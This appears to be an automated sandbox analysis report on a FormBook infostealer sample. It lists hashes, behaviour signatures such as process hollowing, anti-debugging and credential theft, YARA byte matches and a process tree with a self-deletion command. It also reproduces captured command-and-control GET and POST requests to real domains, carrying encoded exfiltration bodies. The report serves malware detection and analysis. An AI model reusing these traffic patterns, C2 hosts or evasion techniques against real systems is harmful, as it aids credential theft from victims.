
Analysis Report Scn14.092020.scr

Overview

General Information

Sample Name: Scn14.092020.scr (renamed file extension from scr to exe)
Analysis ID: 285096
MD5: f3dcebdfd88e627e79f078f41a676b76
SHA1: 7837347cbb14d59cc979731c88011df78dd62ae4
SHA256: 6af2c88ffcb5d4290c1bef29781f58505d75654ea54d42ee04d59b93e723c799

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scn14.092020.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3DCEBDFD88E627E79F078F41A676B76)
    • Scn14.092020.exe (PID: 6584 cmdline: C:\Users\user\Desktop\Scn14.092020.exe MD5: F3DCEBDFD88E627E79F078F41A676B76)
      • explorer.exe (PID: 3368 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
  • 0x160ec:$sqlite3step: 68 34 1C 7B E1
  • 0x16008:$sqlite3text: 68 38 2A 90 C5
  • 0x1612d:$sqlite3text: 68 38 2A 90 C5
  • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(the original report collapses this table; it lists 19 entries)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Scn14.092020.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Scn14.092020.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Scn14.092020.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x153d9:$sqlite3step: 68 34 1C 7B E1
  • 0x154ec:$sqlite3step: 68 34 1C 7B E1
  • 0x15408:$sqlite3text: 68 38 2A 90 C5
  • 0x1552d:$sqlite3text: 68 38 2A 90 C5
  • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
1.2.Scn14.092020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Scn14.092020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(the original report collapses this table; it lists 1 further entry)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Scn14.092020.exe | Virustotal: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.Scn14.092020.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A4F460 FindFirstFileW,FindNextFileW,FindClose | 5_2_00A4F460
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A4F459 FindFirstFileW,FindNextFileW,FindClose | 5_2_00A4F459
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A4F585 FindFirstFileW,FindNextFileW,FindClose | 5_2_00A4F585
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 4x nop then pop edi | 1_2_00415001
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 4x nop then pop edi | 1_2_0040C119
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 5_2_00A55001
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 5_2_00A4C119

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49771
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNeqrRFHbPNe/5B8Pw== HTTP/1.1 | Host: www.aktivasi-asuransi-bukalapak.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?Fzr4zDK=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bD544eiDWVMpw/c/g==&cj=VTjDONEhQdtp_D7 HTTP/1.1 | Host: www.keebcat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA93xRa5BlVihhxKWfRA== HTTP/1.1 | Host: www.nittayabeauty.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?Fzr4zDK=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTltPR5tJ2I5Jl1jMjmA==&cj=VTjDONEhQdtp_D7 HTTP/1.1 | Host: www.jblmhomestore.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqDPzebR02j5AZFkbQ== HTTP/1.1 | Host: www.chehol.directory | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?Fzr4zDK=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHslzxo1OscfD9AW+8w==&cj=VTjDONEhQdtp_D7 HTTP/1.1 | Host: www.martjeje2.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=mgpYILHtvr0Mwg0MZYgF77N/xUypMH4IxLzlgyPIKQxLVyQFR0wmQaHW4IQmamE6UWjr48at2Q== HTTP/1.1 | Host: www.kq-iot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?Fzr4zDK=Q8+WM2Bomf5ni0SwuCpoBHUW8n6b7DImGNKI7675UaWCEqnlNuWrArVDxgeCSXP0JeKD6A53Gw==&cj=VTjDONEhQdtp_D7 HTTP/1.1 | Host: www.ekcraftmasters.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1 | Host: www.hqxmf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1 | Host: www.hqxmf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?Fzr4zDK=3AET6+Fblh40BCXQRB4KEY1DB+MApctu3/uB71K+4nCKf3Spdfy3uFQQowE4NnJx4EY2v4wM1g==&cj=VTjDONEhQdtp_D7 HTTP/1.1 | Host: www.panoramazoom.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFRzM0ZtWPZ4zyVFx2w== HTTP/1.1 | Host: www.ashleygrady.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 209.99.40.222
Source: Joe Sandbox View | IP Address: 204.11.56.48
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 75 28 39 36 42 39 70 62 76 48 47 49 4c 4c 4f 70 2d 73 54 6e 64 76 2d 68 4a 4f 53 76 73 75 6d 36 46 68 67 62 43 4b 44 58 45 7a 47 78 72 71 31 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 2d 35 46 79 65 74 47 7a 4c 30 6f 6a 4f 64 36 70 45 30 61 6d 57 55 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 75 28 39 36 42 39 70 62 76 48 47 49 4c 4c 4f 70 2d 73 54 6e 64 76 2d 68 4a 4f 53 76 73 75 6d 36 46 68 67 62 43 4b 44 58 45 7a 47 78 72 71 31 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 2d 35 46 79 65 74 47 7a 4c 30 6f 6a 4f 64 36 70 45 30 61 6d 57 55 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nittayabeauty.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.nittayabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nittayabeauty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 72 77 74 70 4a 5a 31 6c 70 58 58 6a 44 67 56 49 33 4f 34 61 77 72 37 6c 49 5f 51 57 79 61 33 31 6f 50 33 48 50 65 65 69 47 75 6e 75 62 41 79 68 48 33 4e 6a 70 66 6d 43 67 56 4e 31 56 61 35 7a 64 51 4a 67 28 4b 65 32 64 34 4a 72 61 75 77 61 57 36 62 47 45 68 7a 4e 31 37 64 76 5a 36 33 6c 7a 4c 35 6c 55 72 43 4c 56 4a 32 59 28 67 51 48 78 6f 34 70 4e 52 30 57 37 63 44 7a 47 75 45 61 61 39 47 31 4e 2d 45 36 75 5f 6a 45 6b 32 6f 38 36 73 61 7a 39 66 43 35 58 36 51 5a 4e 36 4e 30 6a 34 71 4d 45 50 41 44 58 36 4b 77 58 33 55 67 32 30 6d 35 56 56 70 65 64 51 6b 36 48 64 6a 70 4b 6e 4d 4e 38 41 58 75 66 39 47 6f 61 4c 67 68 57 65 50 48 78 41 55 77 7a 78 42 63 6b 4c 45 37 30 56 76 47 41 77 28 50 38 49 67 2d 70 4b 70 7a 47 4c 4d 33 53 48 61 49 31 55 71 41 6f 32 36 6c 44 53 6f 52 36 6d 36 57 69 59 6a 70 70 73 73 42 28 43 48 6d 4d 65 38 6b 5a 7a 65 48 68 4e 56 6b 54 78 57 56 4e 50 33 6a 7e 70 62 4d 31 52 30 5f 41 41 4e 6a 28 43 32 6e 78 37 34 6f 76 62 50 5f 51 31 41 4f 4f 77 57 46 4f 33 4c 51 6f 31 35 46 54 37 77 58 32 50 51 79 67 2d 4e 50 64 73 7e 4b 39 53 65 69 77 48 54 2d 28 51 4d 34 51 6b 75 6a 34 6e 6e 4a 53 77 4f 66 4d 61 6b 30 33 44 76 6b 37 66 37 45 53 32 6e 61 4b 66 6f 50 7a 6f 46 69 31 68 37 31 6c 66 49 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=rwtpJZ1lpXXjDgVI3O4awr7lI_QWya31oP3HPeeiGunubAyhH3NjpfmCgVN1Va5zdQJg(Ke2d4JrauwaW6bGEhzN17dvZ63lzL5lUrCLVJ2Y(gQHxo4pNR0W7cDzGuEaa9G1N-E6u_jEk2o86saz9fC5X6QZN6N0j4qMEPADX6KwX3Ug20m5VVpedQk6HdjpKnMN8AXuf9GoaLghWePHxAUwzxBckLE70VvGAw(P8Ig-pKpzGLM3SHaI1UqAo26lDSoR6m6WiYjppssB(CHmMe8kZzeHhNVkTxWVNP3j~pbM1R0_AANj(C2nx74ovbP_Q1AOOwWFO3LQo15FT7wX2PQyg-NPds~K9SeiwHT-(QM4Qkuj4nnJSwOfMak03Dvk7f7ES2naKfoPzoFi1h71lfI.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.jblmhomestore.netConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.jblmhomestore.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jblmhomestore.net/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 61 47 72 47 36 65 50 42 55 7a 72 52 30 63 7a 62 34 56 70 4d 72 64 6c 31 57 54 50 6d 75 34 76 53 4a 30 6a 49 50 2d 44 7a 48 79 6f 64 63 37 68 78 4b 43 4a 59 70 53 49 44 7e 4d 6a 36 6e 73 42 4f 44 4a 39 44 76 77 6b 47 6e 55 4c 59 30 4e 66 55 37 43 47 44 51 50 32 6a 55 41 71 6b 7e 6f 79 68 77 41 49 68 63 69 54 5a 61 57 6b 37 32 6d 53 74 6b 38 49 58 63 49 70 47 50 62 28 48 28 62 7e 37 56 6a 41 57 34 62 73 4d 48 45 44 50 71 50 55 6e 63 54 65 46 4f 7a 6d 2d 48 62 70 47 7e 37 67 34 70 33 7e 61 28 70 6a 61 6e 77 70 52 73 4a 78 75 77 62 38 53 6a 4f 4a 2d 37 76 6b 63 65 31 67 6a 28 67 67 2d 79 34 32 4d 4b 7a 49 69 57 57 6d 46 6c 53 51 43 63 4c 66 43 32 51 4b 6e 75 74 30 32 72 43 6a 42 76 33 74 67 55 64 74 54 7e 31 7e 65 70 6f 49 64 53 69 62 46 6f 5f 35 43 39 6d 65 46 55 6e 73 6e 50 4b 70 4a 31 7a 68 5a 32 71 71 77 49 48 69 67 28 6f 32 4c 77 41 31 68 31 41 63 75 54 65 46 4d 38 5f 31 73 7e 2d 6c 62 33 5a 65 42 4e 59 4b 69 58 6c 52 33 37 76 47 45 63 58 67 51 32 56 5a 33 55 44 6d 59 39 56 6c 59 7e 50 76 76 42 76 59 67 38 4c 6a 34 6c 30 56 41 6e 39 45 38 77 34 51 71 4c 34 62 55 56 45 6b 6a 53 5f 44 61 47 5a 4a 51 51 6a 57 59 4a 77 62 66 51 70 71 52 33 38 56 7a 71 6c 59 4c 70 62 53 59 4b 63 6e 6e 6c 69 35 5f 7a 46 67 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=aGrG6ePBUzrR0czb4VpMrdl1WTPmu4vSJ0jIP-DzHyodc7hxKCJYpSID~Mj6nsBODJ9DvwkGnULY0NfU7CGDQP2jUAqk~oyhwAIhciTZaWk72mStk8IXcIpGPb(H(b~7VjAW4bsMHEDPqPUncTeFOzm-HbpG~7g4p3~a(pjanwpRsJxuwb8SjOJ-7vkce1gj(gg-y42MKzIiWWmFlSQCcLfC2QKnut02rCjBv3tgUdtT~1~epoIdSibFo_5C9meFUnsnPKpJ1zhZ2qqwIHig(o2LwA1h1AcuTeFM8_1s~-lb3ZeBNYKiXlR37vGEcXgQ2VZ3UDmY9VlY~PvvBvYg8Lj4l0VAn9E8w4QqL4bUVEkjS_DaGZJQQjWYJwbfQpqR38VzqlYLpbSYKcnnli5_zFg.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.chehol.directoryConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.chehol.directoryUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chehol.directory/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 67 67 31 6f 6b 32 43 76 35 31 54 67 59 49 6b 5a 57 64 70 67 32 31 65 4f 6c 72 6e 46 4a 78 63 59 6d 4e 63 71 6f 6f 6c 47 72 6c 67 6a 46 72 33 6f 49 42 6c 31 72 6e 7a 41 39 36 72 4c 28 5f 28 37 32 32 50 67 50 5a 68 79 62 4d 39 66 35 4a 39 70 76 79 7e 62 35 73 6d 76 47 4f 46 36 6d 43 69 6f 61 4f 74 2d 39 6f 76 4d 4e 4c 47 4e 35 73 44 31 47 2d 74 58 52 4c 72 32 7a 2d 76 52 62 57 71 66 55 76 56 54 59 68 51 61 57 69 70 62 4b 52 6a 78 6a 6c 66 53 34 76 66 6e 51 30 52 55 38 34 31 64 63 30 52 70 73 59 48 56 45 65 54 4c 6a 33 63 57 62 72 6b 4f 52 4c 30 58 44 4b 71 6e 4c 57 5a 55 55 4e 6c 43 67 66 70 54 39 33 73 48 